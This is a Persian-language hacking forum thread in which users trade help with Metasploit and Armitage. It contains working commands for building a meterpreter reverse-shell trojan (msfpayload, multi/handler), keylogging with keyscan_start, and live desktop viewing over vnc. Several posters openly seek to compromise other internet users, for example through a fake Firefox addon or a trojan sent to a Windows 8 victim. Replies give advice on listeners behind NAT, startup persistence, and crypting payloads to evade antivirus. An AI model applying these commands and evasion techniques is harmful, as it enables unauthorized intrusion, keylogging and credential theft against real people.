هیچ فرقی نمیکنه تمامی انتی ویروسها به این برنامه گیر میدن شما باید پوشه rapid7 رو توی لیست اطمینان ویروس یاب تون قرار بدید
120418

این تصویر مربوط میشه به نود 32 امید وارم متوجه شده باشید که باید کجا ها رو تنظیم کنید

XoDiAK
01-09-2015, 06:27 PM
سلام یک سوال داشتم اونم این که من متااسپلویت رو روی ویندوز نصب کردم منتها باید همیشه انتی ویروس هم رو خاموش کنم چون در هر حال توی حالت روشن گیر میده می خواستم بدونم که چکار کنم که در حالت روشن انتی ویروس گیر نده
در ضمن در گوگل سرچ کردم یکی از راه کار ها این بود که باید متااسپلوت رو روی usbنصب کنم اما چجور باید روی usbنصب کنم چون هر کاری که کردم روی usbمتااسپلوت بالا نمی امد شاید راه کاره باشه که بتوان کاری کرد که انتی ویروس گیر نده یا روی usbنصب کرد
metasploit:4.11.0
antivirus:Kaspersky internet security

سلام اگه میخواید متااسپلویت رو روی فلش نصب کنید نمیشه ولی راهی هست که اونم دانلود Metasploitable2 هستش واون

رو روی Vmware یا روی فلش بوت کنید این سیستم عامل تحت لینوکس هست و مخصوص Metasploit هست لینک دانلود اگه

خواستید دانلود کنید :

[Only registered and activated users can see links]

amirali021
01-10-2015, 11:19 AM
برای چی ارور میده ؟ [Only registered and activated users can see links]

armitage

متاسفانه کسی جواب رو نمیدونه :(

A75s6m
01-10-2015, 11:48 AM
برای چی ارور میده ؟ [Only registered and activated users can see links]

armitage

متاسفانه کسی جواب رو نمیدونه :(

عکس موجود نیست

Regex
01-10-2015, 12:05 PM
دوستان ، من روی سرور ، Metasploit را نصب کردم . حالا چطور میشه با Armitage به سرور متصل شد ؟

IP سرور رو نوشم ولی یوزر و پسورد می خواهد ؟ چطور Config کنم ؟

XoDiAK
01-10-2015, 12:28 PM
دوستان ، من روی سرور ، Metasploit را نصب کردم . حالا چطور میشه با Armitage به سرور متصل شد ؟

IP سرور رو نوشم ولی یوزر و پسورد می خواهد ؟ چطور Config کنم ؟

سلام رو چه جور سروری نصب کردین لینوکس یا ویندوز ؟؟؟
پس :msf
یوزر :msf

رو امتحان کنید ببینید وصل میشه ؟؟

ولی به نظر من استفاده از ارمیتج اشتباه هست بهتره با SSH وصل بشید و با کنسول کارتون رو راه بندازید با ارمیتج

کارتون سخت میشه :(

اگه کار دیگه دارید یاهو رو ادد کنید

amirali021
01-10-2015, 01:08 PM
عکس موجود نیست

[Only registered and activated users can see links]

amirali021
01-11-2015, 10:57 PM
ببخشید! ولی مجبورم up بدم!

Hosein)root
01-11-2015, 11:06 PM
به نقل ازاین وبسایت براتون ترحمه می کنم عین ارور شما رو
[Only registered and activated users can see links]

Either Metasploit is not installed or your environment is not setup correctly. You probably did not use the full setup Metasploit installer and that is why. Install Metasploit with the full setup installer.
یا متا اسپلویت شما نصب نشده یا محیط شما به درستی تنظیم نشده شما احتمالا استفاده نکردید از نسخه فول ست اپ متا اسپلویت. متا اسپلویت رو فول نصب کنید
*****************
توی همون جا لینک دانلودم داده

Muts
01-11-2015, 11:29 PM
[Only registered and activated users can see links]


ببخشید! ولی مجبورم up بدم!

سلام
این ابزار رو در پلت فرم اصلیش استفاده کنید ، در ویندوز به مشکلاتی میخورید که واقعا بعضی وقت ها غیرقابل حله
اموزش نصب و راه اندازیش هم داخل همین بخش هست
موفق باشید

Muts
01-11-2015, 11:30 PM
نوشته اصلی توسط Masoud_Ice نمایش پست ها
دوستان ، من روی سرور ، Metasploit را نصب کردم . حالا چطور میشه با Armitage به سرور متصل شد ؟

IP سرور رو نوشم ولی یوزر و پسورد می خواهد ؟ چطور Config کنم ؟
روی سرور ؟ چه سروری؟
اموزش راه اندازی metasploit و armitage داخل فروم هست ، همون طور که در پست قبل گفتم در پلت فرم خودش نصب کنید

Hosein)root
01-11-2015, 11:56 PM
همون طور که در پست قبل گفتم در پلت فرم خودش نصب کنید

با تشکر از حسین گرامی
خود متا اسپلویت پلت فرمه
و خود شرکت سازنده هم برای ویندوز و هم برای لینوکس انواع نسخه های تجاری و تریال منتشر می کنه
که به راحتی قابل استفاده هستند هم نسخه proوهم بقیه نسخه های منتشر شده در ویندوز و لینوکس

spider2
01-12-2015, 01:23 PM
سلام یک سوال داشتم اونم اینکه ایا نرم افزاری به جز متااسپلوت وجود دارد که قدرت دور زدن فایر وال را داشته باشد

alireza h
01-12-2015, 06:34 PM
سلام

دو تا سوال داشتم
ما وقتی به تارگت که فایل رو بش دادیم کانکت می شیم و بده این که کارمون رو کردیم و دیگه مجبور بودیم دیس کانکت بشیم

چجوری دباره به اون سرور کانکت بشیم ؟
ایا باید دباره بش سرورو بدم ؟
اگه اکسپولایت و پیلواد هم خواستید برای جواب دادن می زارم : )

----------------------------------------------------------
وقتی keyscan_start رو می زنم کی هایه ذخیره شده کجا می ر] ؟
چجوری می تونمدسکتاپ رو زنده ببینم :دی ؟

BBESTBOYY
01-12-2015, 07:30 PM
با سلام
آموزش های این تاپیک پوچ هستن لینکشون خرابه
[Only registered and activated users can see links]
حالا که دیگه هیچ منبعی نیس چه منبعی رو شما معرفی میکنید؟

alireza h
01-12-2015, 09:53 PM
با سلام
آموزش های این تاپیک پوچ هستن لینکشون خرابه
[Only registered and activated users can see links]
حالا که دیگه هیچ منبعی نیس چه منبعی رو شما معرفی میکنید؟

80% لینک های این تاپیک تست شدن و کار می کنن >........
اگه اموزشی برای متا می خواین تاپیک های زیر هستند (( که با کمی سرچ بیشتر هم پیدا می شه ... ))

[Only registered and activated users can see links]

[Only registered and activated users can see links] B%8C%D8%AA-%D8%A7%D8%B2-%D9%BE%D8%A7%DB%8C%D9%87-lt


[Only registered and activated users can see links] B%8C%D8%AA!

[Only registered and activated users can see links]

[Only registered and activated users can see links]

Regex
01-12-2015, 10:23 PM
روی سرور ؟ چه سروری؟
اموزش راه اندازی metasploit و armitage داخل فروم هست ، همون طور که در پست قبل گفتم در پلت فرم خودش نصب کنید

بله روی سرور مجازی . با سیستم عامل لینوکس ، توضیع Debian .

r00tErr0r
01-13-2015, 03:07 PM
سلام من میخوام یه حمله واقعیو تو vps با متااسپلویت انجام بدم

ولی یه سوال که دارم اینه که من تو ارمیتیج lhost ای پی خود وی پی اس رو بزنم ؟

XoDiAK
01-13-2015, 03:12 PM
سلام من میخوام یه حمله واقعیو تو vps با متااسپلویت انجام بدم

ولی یه سوال که دارم اینه که من تو ارمیتیج lhost ای پی خود وی پی اس رو بزنم ؟

بله باید ای پی خوده vps رو وارد کنید

r00tErr0r
01-13-2015, 03:14 PM
بله باید ای پی خوده vps رو وارد کنید

ببخشید اگه سوال بی موردی بود چرا که هر چه فیلم تا حالا ساختن رو لوکال هاست بوده

r00tErr0r
01-13-2015, 04:14 PM
یه مشکل دارم اصلا ای پیش کار نمیکنه

مثلا وقتی از این اکسپلویت استفاده میکنم

use exploit/multi/handler
set lhost ip vps
set lport port
exploit
وقتی اکسپلویتو میزنم ای پی قبول نمیکنه و این ارور میده

XoDiAK
01-13-2015, 05:17 PM
یه مشکل دارم اصلا ای پیش کار نمیکنه

مثلا وقتی از این اکسپلویت استفاده میکنم

use exploit/multi/handler
set lhost ip vps
set lport port
exploit
وقتی اکسپلویتو میزنم ای پی قبول نمیکنه و این ارور میده

سلام مشکلی نیست منظور از 0.0.0.0 اینه که بر روی هر ای پی که بتونه لیسن میکنه پورت رو بک دوری که ساختید تست کنید اگه کار نکر بگید تا راهه حلشو بهتون بگم
ولی باید ای پیتون استاتیک باشه ها ....
با تشکر :)
XoDiAK

r00tErr0r
01-13-2015, 06:27 PM
سلام مشکلی نیست منظور از 0.0.0.0 اینه که بر روی هر ای پی که بتونه لیسن میکنه پورت رو بک دوری که ساختید تست کنید اگه کار نکر بگید تا راهه حلشو بهتون بگم
ولی باید ای پیتون استاتیک باشه ها ....
با تشکر :)
XoDiAK

سلام بک دورو ساخت رفتم رو سیستم اجرا کردم ولی بازم کار نداد

نمیدونم مشکل از کجاس اگه ممکنه راهنماییم کنید

ممنون

parsa_91
01-13-2015, 08:29 PM
سلام...
میخواستم ببینم میشه با مودم وایرلسی که دارم که هم نقش یک مودم ای دی اس ال که با ***پورت لن کار میکنه و هم با وایرلسش دستگاه های مختلف با وای فای بهش وصل میشن (درواقع یک جور روتر هم به حساب میاد)
یک شبکه محلی راه انداخت بین دستگاه هایی که بهش وصل هستن؟؟؟ و تست نفوذ رو روی اونها انجام داد به جای اینکه از وی ام ور استفاده کرد؟؟؟

اخه تو گوشیم یه اسنیفر نصب کردم - کامپیوتر رو که با یک لن به مودم بود رو به عنوان ی ماشین شناخت و اسنیف کرد.

alireza h
01-14-2015, 12:59 PM
سلام

دو تا سوال داشتم
ما وقتی به تارگت که فایل رو بش دادیم کانکت می شیم و بده این که کارمون رو کردیم و دیگه مجبور بودیم دیس کانکت بشیم

چجوری دباره به اون سرور کانکت بشیم ؟
ایا باید دباره بش سرورو بدم ؟
اگه اکسپولایت و پیلواد هم خواستید برای جواب دادن می زارم : )

----------------------------------------------------------
وقتی keyscan_start رو می زنم کی هایه ذخیره شده کجا می ر] ؟
چجوری می تونمدسکتاپ رو زنده ببینم :دی ؟

سوال من جا موند :) یکی جواب بده دیه:دی

r00tErr0r
01-14-2015, 01:44 PM
سوال من جا موند :) یکی جواب بده دیه:دی

شما باید یک دور روی سیستم ایجاد کنی !

اکسپلویت و پایلود رو بزارید تا نحوه نفوذتون رو برسی کنیم ...!

شما وقتی این دستور رو میزنید اگه در متاساپلویت بزنید که همون موقع محل ذخیر فایل رو نشون میده و اسنیف رو هم توی کنسول نشون میده ،
تو ارمتیج هم به همین شکل هست ، با این تفاوت که محل ذخیره فایل هایی که از تارگت دزدیده اید رو همه رو یکجا و در یک فایل ذخیر میکنه .

برای این که شما بخواید دسکتاپ تارگت رو مشاهده کنید باید از طریق کنسول نفوذ کرده باشید و با دستور
vnc میتونید سیستم تارگت رو زنده ببینید

r00tErr0r
01-14-2015, 01:48 PM
سلام...
میخواستم ببینم میشه با مودم وایرلسی که دارم که هم نقش یک مودم ای دی اس ال که با ***پورت لن کار میکنه و هم با وایرلسش دستگاه های مختلف با وای فای بهش وصل میشن (درواقع یک جور روتر هم به حساب میاد)
یک شبکه محلی راه انداخت بین دستگاه هایی که بهش وصل هستن؟؟؟ و تست نفوذ رو روی اونها انجام داد به جای اینکه از وی ام ور استفاده کرد؟؟؟

اخه تو گوشیم یه اسنیفر نصب کردم - کامپیوتر رو که با یک لن به مودم بود رو به عنوان ی ماشین شناخت و اسنیف کرد.

سوالتون و یکم پیچیده کردید وی ام وویر ماشین مجازی برای نصب سیستم عامل ها هست ، تا حالا نشنیدم که مود رو به عنوان ماشین مجازی بشناسه ، ولی اگه چند کامپیوتر و حلا گوشی به مودم وایرلس شما کانکت بشن در اصل به هر کدوم از اینا یه ادرس ای پی تعلق میگیره که به اکسس پوینتتون وصل شدن و شما میتونید عمل اسنیف رو در کالی روی این سیستم ها انجام بدید ، پیشنهاد میکنم از ارمیتیج رنج ای پی ها رو اسکن کنید و بعد از این که سیستم و سیستم عامل ها شناخته شدن شروع به اسنیف کردن کنید

alireza h
01-14-2015, 03:58 PM
شما باید یک دور روی سیستم ایجاد کنی !

اکسپلویت و پایلود رو بزارید تا نحوه نفوذتون رو برسی کنیم ...!

شما وقتی این دستور رو میزنید اگه در متاساپلویت بزنید که همون موقع محل ذخیر فایل رو نشون میده و اسنیف رو هم توی کنسول نشون میده ،
تو ارمتیج هم به همین شکل هست ، با این تفاوت که محل ذخیره فایل هایی که از تارگت دزدیده اید رو همه رو یکجا و در یک فایل ذخیر میکنه .

برای این که شما بخواید دسکتاپ تارگت رو مشاهده کنید باید از طریق کنسول نفوذ کرده باشید و با دستور
vnc میتونید سیستم تارگت رو زنده ببینید

ممنون
بک دور ساختم
رو تارگت اجرا شد
حالا می خوام بش دباره کانکت بشم بدون این که دباره بش بک دور بدم
این اموزش رو دنبال کردم [Only registered and activated users can see links]





لطفا کمک کنین سوال زیادم سخت نیس ......

Muts
01-14-2015, 10:39 PM
یه مشکل دارم اصلا ای پیش کار نمیکنه

مثلا وقتی از این اکسپلویت استفاده میکنم

use exploit/multi/handler
set lhost ip vps
set lport port
exploit
وقتی اکسپلویتو میزنم ای پی قبول نمیکنه و این ارور میده
سلام
چه شرایطی این رو تست میکنید؟
(این عکس شما کوچیکه و باز همونم رنگی کردید و با MOb کامل ندیدم )

r00tErr0r
01-14-2015, 10:42 PM
سلام
چه شرایطی این رو تست میکنید؟
(این عکس شما کوچیکه و باز همونم رنگی کردید و با MOb کامل ندیدم )

من میخوام از طریق vps نفوذ کنم ولی ای پی وی پسو قبول نمیکنه نمیدونم چرا

Muts
01-14-2015, 10:44 PM
من میخوام از طریق vps نفوذ کنم ولی ای پی وی پسو قبول نمیکنه نمیدونم چرا

نباید مشکلی داشته باشید ! احتمالا در مسیر پیاده سازی مشکل دارید !

Muts
01-14-2015, 10:49 PM
ممنون
بک دور ساختم
رو تارگت اجرا شد
حالا می خوام بش دباره کانکت بشم بدون این که دباره بش بک دور بدم
این اموزش رو دنبال کردم [Only registered and activated users can see links]





لطفا کمک کنین سوال زیادم سخت نیس ......
سلام
برای ساخت بک دور میتونید برای مثال از Netcat استفاده کنید
از سیستم اکسس دارید دیگه ؟

لینک کمکی
[Only registered and activated users can see links]


شما باید یک دور روی سیستم ایجاد کنی !

اکسپلویت و پایلود رو بزارید تا نحوه نفوذتون رو برسی کنیم ...!

شما وقتی این دستور رو میزنید اگه در متاساپلویت بزنید که همون موقع محل ذخیر فایل رو نشون میده و اسنیف رو هم توی کنسول نشون میده ،
تو ارمتیج هم به همین شکل هست ، با این تفاوت که محل ذخیره فایل هایی که از تارگت دزدیده اید رو همه رو یکجا و در یک فایل ذخیر میکنه .

برای این که شما بخواید دسکتاپ تارگت رو مشاهده کنید باید از طریق کنسول نفوذ کرده باشید و با دستور
vnc میتونید سیستم تارگت رو زنده ببینید
فکرمیکنم شما منظور این دوستمون رو اشتباه برداشت کردید

alireza h
01-15-2015, 11:27 AM
* من بک دور رو به تارگت دادم
* تارگت مثلا ویندوز خودمه رو vmware
* تارگت اجرا کرد
* دسترسی گرفتم همه کارم می کنم
* حالا مثلا فردای اون روز من دباره می خوام ب اون تارگت کانکت بشم ! با ارمیتیج باید اینکارو کنم ؟ با متا نمی شه ؟ دباره باید بک دور دیگه بسازم بش بدم :؟!

alireza h
01-15-2015, 11:57 AM
یه سوال دیگه :دی
تویه هک با fake firefox addon ت اموزشش که خارجیه می زنه
set srvhost i.p.i.khodesh
set srvport 80
set urlpath /intallation
و ....
که ادرس به این صورت در میاد ipikhodesh:80/installation
بد addon فایرفاکس رو نصب می کنه رو خودش امتحان کرد خودشو هک کرد .... :دی
حالا اگه من بخوام یکی دیگرو هک کنم مثلا اقای x
باید چجوری لینک addon رو بش بدم :| این فقط یاد داد خودمونو هک کنیم >.............

BBESTBOYY
01-15-2015, 12:05 PM
با سلام
لطفا سوالات رو جا نزارید و یک به یک جواب بدید ممنون
۱- آرمیتیج یا متاسپلویت؟
۲- روش کار با اسکپلویت های چجوریه؟(به طور کلی و به صورت خیلی خلاصه)
۳- میشه چند تا از کار های اکسپلویت ها رو بگید؟

alireza h
01-15-2015, 12:16 PM
با سلام
لطفا سوالات رو جا نزارید و یک به یک جواب بدید ممنون
۱- آرمیتیج یا متاسپلویت؟
۲- روش کار با اسکپلویت های چجوریه؟(به طور کلی و به صورت خیلی خلاصه)
۳- میشه چند تا از کار های اکسپلویت ها رو بگید؟

سلام
1- ارمیتیج همون متاسپلویت هست اما با محیط گرافیکی که کاربر پسند و خوبه در ضمن بیشتر کار هارم خودکار انجام می ده
خیلی کارو ساده کرده چیزه خوبیه در کنار متا ازش استفاده کنین .....

2- اگه باز در متا روش کار با اکسپلویت هارو می خوای در کل در بیشترشون ایپی خودتو می دی ای پی تارگت و پورت اینجور چیزا
برای این که بفهمی هر اکسپلویت چی می خواد show option رو بزن یا info

3- اینو نفهمیدم :دی در کل اکسپلویت ها نوشته می شن تا از ضعف هایه امنیتی راحت تر استفاده کرد ......

BBESTBOYY
01-15-2015, 12:28 PM
منظور سوال ۳: منظورم اینه که مثلا ما با اکسپلویت میتونیم سرور هک کنیم دسترسی بگیریم از ویندوز طرف به غیر از اینا دیگه چه کارهایی میشه کرد

Regex
01-15-2015, 12:32 PM
منظور سوال ۳: منظورم اینه که مثلا ما با اکسپلویت میتونیم سرور هک کنیم دسترسی بگیریم از ویندوز طرف به غیر از اینا دیگه چه کارهایی میشه کرد

هر کاری که شما روی کامپیوتر خودت انجام میدی . به قول معروف Full Access !

دیگر استفاده های Exploit :

Soft Reset Modem
Bypass کردن انواع روش های اهراز حویت
و....

Muts
01-15-2015, 12:46 PM
* من بک دور رو به تارگت دادم
* تارگت مثلا ویندوز خودمه رو vmware
* تارگت اجرا کرد
* دسترسی گرفتم همه کارم می کنم
* حالا مثلا فردای اون روز من دباره می خوام ب اون تارگت کانکت بشم ! با ارمیتیج باید اینکارو کنم ؟ با متا نمی شه ؟ دباره باید بک دور دیگه بسازم بش بدم :؟!
سلام
اون لینکی که من معرفی کردم رو دیدید ؟ جواب داخلش بود !

Muts
01-15-2015, 12:49 PM
دوستان لطفا مطالب بخش رو مطالعه کنید و بعد سوال بپرسید
حالا گوگل که هیچ ! اما از مطالب داخل همین بخش که به زبان فارسی روان هستش رو که میتونید مطالعه کنید

سوالاتی ابتدایی و مشکلاتی که قبلا داخل همین بخش یا بهش پاسخ داده شده و یا مطالبی در موردش هست و بحث شده رو ریپلای ندید

BBESTBOYY
01-15-2015, 01:04 PM
ببخشید زیاد سوال میپرسم
این آخرین سوالم
چجوری اکسپلویت مورد نظر رو میشه پیدا کرد؟
مثلا من برای هک ویندوز یه اکسپلویت میخوام چجوری در آرمیتیج بین اون همه اکسپلویت هک ویندوز اکسپلویت هک ویندوز ۸.۱ رو پیدا کنم یا ویندوز ۷

alireza h
01-15-2015, 02:12 PM
سلام
اون لینکی که من معرفی کردم رو دیدید ؟ جواب داخلش بود !

ببخشید :دی بله من لینک رو دیدم و چیزی که متوجه شدم این بود :
بد از دسترسی پورت 445 رو باز می کنیم دفه بدی که خواسیم وارد شیم از این دستور استفاده می کنیم : nc -v ipi targer 455
درست فهمیدم ؟ برای همه بک دور ها این مورد استفاده قرار می گیره ؟

BBESTBOYY
01-15-2015, 02:29 PM
ببخشید زیاد سوال میپرسم
این آخرین سوالم
چجوری اکسپلویت مورد نظر رو میشه پیدا کرد؟
مثلا من برای هک ویندوز یه اکسپلویت میخوام چجوری در آرمیتیج بین اون همه اکسپلویت هک ویندوز اکسپلویت هک ویندوز ۸.۱ رو پیدا کنم یا ویندوز ۷
اشتباه شد حذف کنید

r00tErr0r
01-15-2015, 02:45 PM
ببخشید زیاد سوال میپرسم
این آخرین سوالم
چجوری اکسپلویت مورد نظر رو میشه پیدا کرد؟
مثلا من برای هک ویندوز یه اکسپلویت میخوام چجوری در آرمیتیج بین اون همه اکسپلویت هک ویندوز اکسپلویت هک ویندوز ۸.۱ رو پیدا کنم یا ویندوز ۷

خب برای سرچ در کنسول شما میتونید از دستور

search windws و یا show -h اکسپلویت ها و ماژول های مورد نظر خودتون رو سرچ کنید

و در ارمیتیج محیط گرافیکی از قسمت سمت چپ برنامه
payload ها exploit ها و ... وجود دارد که شما وقتی اکسپلویت رو باز کنی انواع اکسپلویت مخصوص سیستم عامل ها رو مشاهده میکنید و پایلود ها هم به همین ترتیب
exploit / window
exploit / multi / windows
و دگه بستگی به دقت خودتون داره ، البته زیر همین قسمتی که ماژول ها قرار دارند یه سرچ بار قرار داره که از اونجا هم میتونید استفاده کنید

BBESTBOYY
01-15-2015, 03:15 PM
من هر بار بعد از ورود به کالی لینوکس برای اجرای آرمیتیج باید این ۳ دستور رو بزنم بعد آرمیتیج رو اجرا کنم
service postgresql start
service metasploit start
service metasploit stop
چکار کنم که دیگه نیازی نباشه این هارو بزنم؟

r00tErr0r
01-15-2015, 03:25 PM
من هر بار بعد از ورود به کالی لینوکس برای اجرای آرمیتیج باید این ۳ دستور رو بزنم بعد آرمیتیج رو اجرا کنم
service postgresql start
service metasploit start
service metasploit stop
چکار کنم که دیگه نیازی نباشه این هارو بزنم؟

اگه از نسخه live استفاده میکنید که اینکارو باید بعد از هر بار بالا اوردن سیستم بکنید
ولی در مورد این مسئله اطلاعی ندارم service metasploit stop رو که نباید بزنید ، postgresql هم مربوط میشه به دیتا بیس ارمیتیج

BBESTBOYY
01-15-2015, 07:11 PM
علت این ارور هنگام اجرای آرمیتیج چه میباشد؟
120704
این سه دستوری رو که گفته اجرا میکنم و آرمیتیج اجرا میشه اما بعد خاموش کردن و دوباره اومدن به کالی دوباره باید این سه دستور رو وارد کنم تا وارد آرمیتیج بشه مشکل چیه؟

r00tErr0r
01-15-2015, 07:17 PM
علت این ارور هنگام اجرای آرمیتیج چه میباشد؟
120704
این سه دستوری رو که گفته اجرا میکنم و آرمیتیج اجرا میشه اما بعد خاموش کردن و دوباره اومدن به کالی دوباره باید این سه دستور رو وارد کنم تا وارد آرمیتیج بشه مشکل چیه؟

شما ترمینالو باز کن این دوتا دستور بزن دوباره ارمیتیج رو اجرا کن ،

Service postgresql start
service metasploit start

ولی همون postgresql رو استارت کنی حله

این مشکل نیست خوب فکر میکنم یه چیز معمولی باشه

Flooder12
01-15-2015, 10:26 PM
با سلام یه همه.

من وقتی میخوام آرمیتیج رو باز کنم تو کالی باز نمیشه.
این ها رو هم میزنم service postgresql start و service metasploit start
ولی موقع باز شدن روی connect کلیک میکنم خیـــــــــــــــــــــــ ــــــــــــلی طول میکشه تا لود بشه تا بیاد ولی اصلا نمیاد و سیستم هنگ میکنه.

روی VMware هم هست . نسخه 1.0.9a

کمک کنید واجبه.

r00tErr0r
01-15-2015, 11:22 PM
با سلام یه همه.

من وقتی میخوام آرمیتیج رو باز کنم تو کالی باز نمیشه.
این ها رو هم میزنم service postgresql start و service metasploit start
ولی موقع باز شدن روی connect کلیک میکنم خیـــــــــــــــــــــــ ــــــــــــلی طول میکشه تا لود بشه تا بیاد ولی اصلا نمیاد و سیستم هنگ میکنه.

روی VMware هم هست . نسخه 1.0.9a

کمک کنید واجبه.

وقتی رو وی ام ویر نصب کردید چقدر رم و حافظه بهش اختصاص دادید ؟

salisali
01-15-2015, 11:43 PM
سلام دوستان
امیدوارم حالتون خوب باشه!

به این صورت انجام دادم:


1.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=6666 x> ~/Desktop/trojan.exe که آی پی رو از ifconfig گرفتم و زدم و پورتو هویجوری عشقی!

2.
use exploit/multi/handler
set LHOST 192.168.x.y
set LPORT 6666
set payload windows/meterpreter/reverse_tcp
exploit

3.رفتم تو ویندوز تروجان رو اجرا کردم و اجرا شد تا اینجا هیچ مشکلی نیس حتی شلم گرفتم!



سوال و مشکل:


1.واسه نفوذ به شخص دیگه در اینترنت، تو مورد اول واسه LHOST باید آی پی لوکال رو بزنم یا آی پی ای که تو whatismyip نشون میده؟ اگه لوکال، واسه ویندوز رو بزنم یا واسه بک ترکی که با vmware اجرا شده؟

2.واسه همین مورد اول باید از آی پی خودم استفاده بشه یا از NO-IP یعنی آدرس مثلا mydns.no-ip.com رو بهش بدم یا آی پی خودمو؟

3.درباره پورت اینکه حتما باید پورت فوروارد کنم؟ و اگه آره دوباره باید بپرسم که باید تو اون قسمت Server IP address آی پی لوکال، یونیورسال یا NO-IP رو وارد کنم؟

4.واسه شماره 2 اگه باید آدرس NO-IP رو بدیم، پس آی پی خودمون چی میشه یا بهتره بگم اصلن لزوم درست کردن اکانت تو NO-IP چیه وختی خودمون آی پی داریم؟ ممنون میشم موارد 2 و 3 رو کامل توضیح بدین که بدونم دقیقا داره چه اتفاقی می افته؟

5.یه مشکل دیگه ام وجود داره و اون اینه که باید حتمن قبلش بزنی exploit بعد طرف اجرا کنه تا به نتیجه برسی، نمیشه یه کاری کرد که هرموقه اون برنامه اجرا شد و هرموقه ما exploit زدیم نتیجه بده مثلن اون فایل رو بزاریم تو startup ویندوز هربار بتونیم به طرف نفوذ کنیم؟

6.وختی میشه از msfencode استفاده کرد، چرا کریپتر؟ راسی بعد از اینکود شدن به این روش یه اروری میده، میگه: Program too big to fit in memory چیکار کنم؟

7.و یه سوال کلی دیگه اینکه: این کیلاگرا از کجا میفهمن که باید از فلان برنامه یوزر و پسشو بفرستن به اونجایی که ما میخایم؟ یعنی مثلا این همه برنامه هست، نیمباز، یاهو و... این برنامه ها از کجا میفهمن که باید از کدوم برنامه بفرستن به ما؟ و چجوری میشه تعیینش کرد؟

8.یه بار یه تروجان فرستادم طرف که ویندوز 8 داشت، اونی که کریپت شده بود ارور میداد میگفت نمیدونم چی چی با آیکون sa یا smart assembly که ویندوز نمیتونه فایلای این شکلیو باز کنه و اونیم که کریپت نشده بود آنتی ویروس گیر میداد گفتم خب دیزیبلش کن گفت باشه اما بازم هیچ اتفاقی نیافتاد!
-----
واقعا معذرت میخام، خیلی طولانی شد!
واقعا لطف میکنین اگه جواب بدین خیلی تو کفم!
خدا نگهدارتون باشه همیشه!

BBESTBOYY
01-15-2015, 11:46 PM
اطلاعاتی کامل در مورد این میخوام که چی لازمه چی نیست آیا وین ۸.۱ یا ۷ رو میتونه هک کنه؟
120734

pooya2ir
01-16-2015, 02:03 PM
با عرض سلام و وقت بخیر

استادان عزیز , سوالم اینه که ایا راهی هست که بعد از هک شدن روتر به کلاینت ها نفوذ و سیستمشون هم هک کرد و دسترسی داشت ؟ (metasploit - arm)

اگر امکانش هست منو راهنمایی بفرمایید
با تشکر.

kashefylord1991
01-16-2015, 02:06 PM
سلام../
من بالاخره نفهمیدم که چطور میتونم با اینترنت gprs کلاینت هک کنم...!!
یا اینکه چه محدودیت هایی داره!!
یا ....
یکی هست بتونه درس و کامل جواب بده!هر جا که فکر بکنید در این مورد گشتم ولی هنوز به جوابی نرسیدم..

BBESTBOYY
01-17-2015, 09:46 AM
اطلاعاتی کامل در مورد این میخوام که چی لازمه چی نیست آیا وین ۸.۱ یا ۷ رو میتونه هک کنه؟
120734

جهت بالا اومدن تاپیک
--------
آخه این انصافه ج نمیدید

A-T44
01-17-2015, 07:14 PM
من آی پی یه سیستم رو دارم، حالا باید یه پورت باز به آرمیتیج تو کالی بدم، ترجیحا چی باید باشه و اون پورتو چطوری باز کنیم؟

XoDiAK
01-17-2015, 07:32 PM
من آی پی یه سیستم رو دارم، حالا باید یه پورت باز به آرمیتیج تو کالی بدم، ترجیحا چی باید باشه و اون پورتو چطوری باز کنیم؟

ترجیحا بهترین پورت ها از نظر بنده پورت 23 و 21 و445 و80 و 110 و 25 هم گاهی اوقات به درد میخوره :)

این ها یکی از بهترین پورت ها برای نفوذ و حمله میباشد پ

با تشکر XoDiAK

A-T44
01-17-2015, 09:10 PM
ترجیحا بهترین پورت ها از نظر بنده پورت 23 و 21 و445 و80 و 110 و 25 هم گاهی اوقات به درد میخوره :)

این ها یکی از بهترین پورت ها برای نفوذ و حمله میباشد پ

با تشکر XoDiAK

خب الان یکی از اینا رو چطوری میتونیم باز کنیم؟
بچ فایلی داره یا دستوری یا چی؟؟؟

Hosein)root
01-17-2015, 10:59 PM
خب الان یکی از اینا رو چطوری میتونیم باز کنیم؟
بچ فایلی داره یا دستوری یا چی؟؟؟

نگاه کنید هر سرویس خاصی که شما استفاده کنید پورت مخصوصش باز میشه
شما باید سیب پذیری اون سرویس رو پچ کنید

marshal3333
01-17-2015, 11:54 PM
از بالا بیاییم پایین


2.
use exploit/multi/handler
set LHOST 192.168.x.y
set LPORT 6666
set payload windows/meterpreter/reverse_tcp
exploit

اینجا یه اشکالی داره شما اول باید پیلود رو انتخاب کنی و بعد آپشن های اونو ست کنی مثل lhost & lport


1.واسه نفوذ به شخص دیگه در اینترنت، تو مورد اول واسه LHOST باید آی پی لوکال رو بزنم یا آی پی ای که تو whatismyip نشون میده؟ اگه لوکال، واسه ویندوز رو بزنم یا واسه بک ترکی که با vmware اجرا شده؟

شما در این حالت پشت nat هستی یا باید آی پی ولید بگیری یا از vps استفاده کنی.



5.یه مشکل دیگه ام وجود داره و اون اینه که باید حتمن قبلش بزنی exploit بعد طرف اجرا کنه تا به نتیجه برسی، نمیشه یه کاری کرد که هرموقه اون برنامه اجرا شد و هرموقه ما exploit زدیم نتیجه بده مثلن اون فایل رو بزاریم تو startup ویندوز هربار بتونیم به طرف نفوذ کنیم؟

چرا می تونی هر فایلی که خواستی آپلود کنی دیگه اون بسته به خودت


6.وختی میشه از msfencode استفاده کرد، چرا کریپتر؟ راسی بعد از اینکود شدن به این روش یه اروری میده، میگه: Program too big to fit in memory چیکار کنم؟

اولا اینکه اکثر انکودر های متاسپلویت رو آنتی ویروس ها دیگه میگیرن
دوما کی گفته وقتی کریپت می کنی اینکود نمیشه
بزار اینطوری بگم
وقتی می خوای اینکود کنی اول پیلود قرار می گیره بعد اینکود
اما وقتی کریپت میکنیم اول پیلود بعد اینکود بعد کریپت بعد کمپرس می کنیم



7.و یه سوال کلی دیگه اینکه: این کیلاگرا از کجا میفهمن که باید از فلان برنامه یوزر و پسشو بفرستن به اونجایی که ما میخایم؟ یعنی مثلا این همه برنامه هست، نیمباز، یاهو و... این برنامه ها از کجا میفهمن که باید از کدوم برنامه بفرستن به ما؟ و چجوری میشه تعیینش کرد؟


اینو دقیق نمیدونم ولی فکر میکنم به یه سرور که وصل میشیم همه ی متود های GET و میگیره و به ایمیلی که تعیین کردیم می فرسته

A-T44
01-18-2015, 03:30 PM
نگاه کنید هر سرویس خاصی که شما استفاده کنید پورت مخصوصش باز میشه
شما باید سیب پذیری اون سرویس رو پچ کنید

خب ممکنه شما یه مثال بزنید؟
صریح تر بگین

salisali
01-18-2015, 04:03 PM
